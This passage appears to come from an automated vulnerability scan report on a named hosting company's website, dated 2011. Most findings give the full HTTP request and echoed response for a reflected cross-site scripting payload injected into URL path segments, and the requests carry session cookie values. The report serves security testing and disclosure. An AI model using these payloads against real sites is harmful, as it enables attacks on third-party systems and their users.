Proxy-Connection: keep-alive
Referer: http://www.leaseweb.com/en/vps/express-cloud/configurator/1314
Cache-Control: max-age=0
Origin: http://www.leaseweb.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.8.10.1303148133

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 18:00:48 GMT
Server: Apache
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14440

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
<a class="en_link" href="/en/shopping-cart/adddbf64"><script>alert(1)</script>83fcdd24711b53e65?combo_id=1314&dummy%5Btype-64_bit%5D=type-32_bit&article%5B664%5D=664&article%5B142%5D=&article%5B817%5D=&article%5B676%5D=676&bandwidth_type%5BStandard%5D=Standard&traffic_type%5BMetered%5D=Metered&a
...[SNIP]...

4.77. http://www.leaseweb.com/en/vps/express-cloud [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.leaseweb.com
Path:   /en/vps/express-cloud

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d668"><script>alert(1)</script>620112c08e0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en6d668"><script>alert(1)</script>620112c08e0/vps/express-cloud HTTP/1.1
Host: www.leaseweb.com
Proxy-Connection: keep-alive
Referer: http://www.leaseweb.com/en
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.1.10.1303148133

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 17:44:53 GMT
Server: Apache
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14053

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl">
<head>
<
...[SNIP]...
<a class="en_link" href="/en6d668"><script>alert(1)</script>620112c08e0/vps/express-cloud">
...[SNIP]...

4.78. http://www.leaseweb.com/en/vps/express-cloud [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.leaseweb.com
Path:   /en/vps/express-cloud

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1af6"><script>alert(1)</script>317bdcdc48b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/vpse1af6"><script>alert(1)</script>317bdcdc48b/express-cloud HTTP/1.1
Host: www.leaseweb.com
Proxy-Connection: keep-alive
Referer: http://www.leaseweb.com/en
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.1.10.1303148133

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 17:47:03 GMT
Server: Apache
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 13916

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
<a class="en_link" href="/en/vpse1af6"><script>alert(1)</script>317bdcdc48b/express-cloud">
...[SNIP]...

4.79. http://www.leaseweb.com/en/vps/express-cloud [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.leaseweb.com
Path:   /en/vps/express-cloud

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9bbba"><script>alert(1)</script>564ba9b85 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/vps/express-cloud9bbba"><script>alert(1)</script>564ba9b85 HTTP/1.1
Host: www.leaseweb.com
Proxy-Connection: keep-alive
Referer: http://www.leaseweb.com/en
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.1.10.1303148133

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 17:49:21 GMT
Server: Apache
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 13912

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
<a class="en_link" href="/en/vps/express-cloud9bbba"><script>alert(1)</script>564ba9b85">
...[SNIP]...

4.80. http://www.leaseweb.com/en/vps/express-cloud/configurator/1314 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.leaseweb.com
Path:   /en/vps/express-cloud/configurator/1314

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7ecf"><script>alert(1)</script>6e9355aecd7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /enc7ecf"><script>alert(1)</script>6e9355aecd7/vps/express-cloud/configurator/1314 HTTP/1.1
Host: www.leaseweb.com
Proxy-Connection: keep-alive
Referer: http://www.leaseweb.com/en/vps/express-cloud
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.2.10.1303148133

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 17:47:01 GMT
Server: Apache
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14089

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl">
<head>
<
...[SNIP]...
<a class="en_link" href="/enc7ecf"><script>alert(1)</script>6e9355aecd7/vps/express-cloud/configurator/1314">
...[SNIP]...

4.81. http://www.leaseweb.com/en/vps/express-cloud/configurator/1314 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.leaseweb.com
Path:   /en/vps/express-cloud/configurator/1314

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ade0"><script>alert(1)</script>d5851fcaebd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/vps1ade0"><script>alert(1)</script>d5851fcaebd/express-cloud/configurator/1314 HTTP/1.1
Host: www.leaseweb.com
Proxy-Connection: keep-alive
Referer: http://www.leaseweb.com/en/vps/express-cloud
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.2.10.1303148133

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 17:48:55 GMT
Server: Apache
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 13952

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
<a class="en_link" href="/en/vps1ade0"><script>alert(1)</script>d5851fcaebd/express-cloud/configurator/1314">
...[SNIP]...

4.82. http://www.leaseweb.com/en/vps/express-cloud/configurator/1314 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.leaseweb.com
Path:   /en/vps/express-cloud/configurator/1314

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ccf0"><script>alert(1)</script>a583e0096d6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/vps/express-cloud9ccf0"><script>alert(1)</script>a583e0096d6/configurator/1314 HTTP/1.1
Host: www.leaseweb.com
Proxy-Connection: keep-alive
Referer: http://www.leaseweb.com/en/vps/express-cloud
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.2.10.1303148133

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 17:50:16 GMT
Server: Apache
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 13952

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
<a class="en_link" href="/en/vps/express-cloud9ccf0"><script>alert(1)</script>a583e0096d6/configurator/1314">
...[SNIP]...

4.83. http://www.leaseweb.com/en/vps/express-cloud/configurator/1314 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.leaseweb.com
Path:   /en/vps/express-cloud/configurator/1314

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 984fb"><script>alert(1)</script>a17f095b3c2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/vps/express-cloud/configurator984fb"><script>alert(1)</script>a17f095b3c2/1314 HTTP/1.1
Host: www.leaseweb.com
Proxy-Connection: keep-alive
Referer: http://www.leaseweb.com/en/vps/express-cloud
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.2.10.1303148133

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 17:51:27 GMT
Server: Apache
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 13952

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
<a class="en_link" href="/en/vps/express-cloud/configurator984fb"><script>alert(1)</script>a17f095b3c2/1314">
...[SNIP]...

4.84. http://www.leaseweb.com/en/vps/express-cloud/configurator/1314 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.leaseweb.com
Path:   /en/vps/express-cloud/configurator/1314

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65081"><script>alert(1)</script>3b28089c87c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/vps/express-cloud/configurator/131465081"><script>alert(1)</script>3b28089c87c HTTP/1.1
Host: www.leaseweb.com
Proxy-Connection: keep-alive
Referer: http://www.leaseweb.com/en/vps/express-cloud
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.2.10.1303148133

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 17:52:21 GMT
Server: Apache
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 13952

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
<a class="en_link" href="/en/vps/express-cloud/configurator/131465081"><script>alert(1)</script>3b28089c87c">
...[SNIP]...

4.85. http://www.leaseweb.com/en/vps/express-cloud/configurator/1314 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.leaseweb.com
Path:   /en/vps/express-cloud/configurator/1314

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c05f0"><script>alert(1)</script>a26b52493b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/vps/express-cloud/configurator/1314?c05f0"><script>alert(1)</script>a26b52493b2=1 HTTP/1.1
Host: www.leaseweb.com
Proxy-Connection: keep-alive
Referer: http://www.leaseweb.com/en/vps/express-cloud
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.2.10.1303148133

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 17:42:38 GMT
Server: Apache
Pragma: no-cache
Cache-Control: private
Expires: -1
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 113777

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
<a class="en_link" href="/en/vps/express-cloud/configurator/1314?c05f0"><script>alert(1)</script>a26b52493b2=1">
...[SNIP]...

4.86. http://www.leaseweb.com/flash/lsw_banner_hp.swf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.leaseweb.com
Path:   /flash/lsw_banner_hp.swf

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f976"><script>alert(1)</script>5000c7ae558 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /flash4f976"><script>alert(1)</script>5000c7ae558/lsw_banner_hp.swf HTTP/1.1
Host: www.leaseweb.com
Proxy-Connection: keep-alive
Referer: http://www.leaseweb.com/en
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.1.10.1303148133

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 17:37:43 GMT
Server: Apache
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl">
<head>
<
...[SNIP]...
<a class="en_link" href="/flash4f976"><script>alert(1)</script>5000c7ae558/lsw_banner_hp.swf">
...[SNIP]...

4.87. http://www.leaseweb.com/flash/lsw_banner_hp.swf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.leaseweb.com
Path:   /flash/lsw_banner_hp.swf

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea376"><script>alert(1)</script>0945beb5808 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /flash/lsw_banner_hp.swfea376"><script>alert(1)</script>0945beb5808 HTTP/1.1
Host: www.leaseweb.com
Proxy-Connection: keep-alive
Referer: http://www.leaseweb.com/en
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.1.10.1303148133

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 17:39:05 GMT
Server: Apache
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl">
<head>
<
...[SNIP]...
<a class="en_link" href="/flash/lsw_banner_hp.swfea376"><script>alert(1)</script>0945beb5808">
...[SNIP]...

4.88. http://www.leaseweb.com/flash/lsw_product.swf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.leaseweb.com
Path:   /flash/lsw_product.swf

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b30d3"><script>alert(1)</script>f39597e52b9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /flashb30d3"><script>alert(1)</script>f39597e52b9/lsw_product.swf HTTP/1.1
Host: www.leaseweb.com
Proxy-Connection: keep-alive
Referer: http://www.leaseweb.com/en
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.1.10.1303148133

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 17:37:55 GMT
Server: Apache
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14053

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl">
<head>
<
...[SNIP]...
<a class="en_link" href="/flashb30d3"><script>alert(1)</script>f39597e52b9/lsw_product.swf">
...[SNIP]...

4.89. http://www.leaseweb.com/flash/lsw_product.swf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.leaseweb.com
Path:   /flash/lsw_product.swf

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e2b6"><script>alert(1)</script>bd542982b78 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /flash/lsw_product.swf9e2b6"><script>alert(1)</script>bd542982b78 HTTP/1.1
Host: www.leaseweb.com
Proxy-Connection: keep-alive
Referer: http://www.leaseweb.com/en
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.1.10.1303148133

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 17:39:12 GMT
Server: Apache
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14053

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl">
<head>
<
...[SNIP]...
<a class="en_link" href="/flash/lsw_product.swf9e2b6"><script>alert(1)</script>bd542982b78">
...[SNIP]...

4.90. http://www.leaseweb.com/images/lsw2/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.leaseweb.com
Path:   /images/lsw2/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 321fb"><script>alert(1)</script>fd4b24958c2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images321fb"><script>alert(1)</script>fd4b24958c2/lsw2/favicon.ico HTTP/1.1
Host: www.leaseweb.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.1.10.1303148133

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 17:37:46 GMT
Server: Apache
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl">
<head>
<
...[SNIP]...
<a class="en_link" href="/images321fb"><script>alert(1)</script>fd4b24958c2/lsw2/favicon.ico">
...[SNIP]...

4.91. http://www.leaseweb.com/images/lsw2/favicon.ico [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.leaseweb.com
Path:   /images/lsw2/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf012"><script>alert(1)</script>a0a86f7335c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/lsw2cf012"><script>alert(1)</script>a0a86f7335c/favicon.ico HTTP/1.1
Host: www.leaseweb.com
Proxy-Connection: keep-alive
Accept: */*
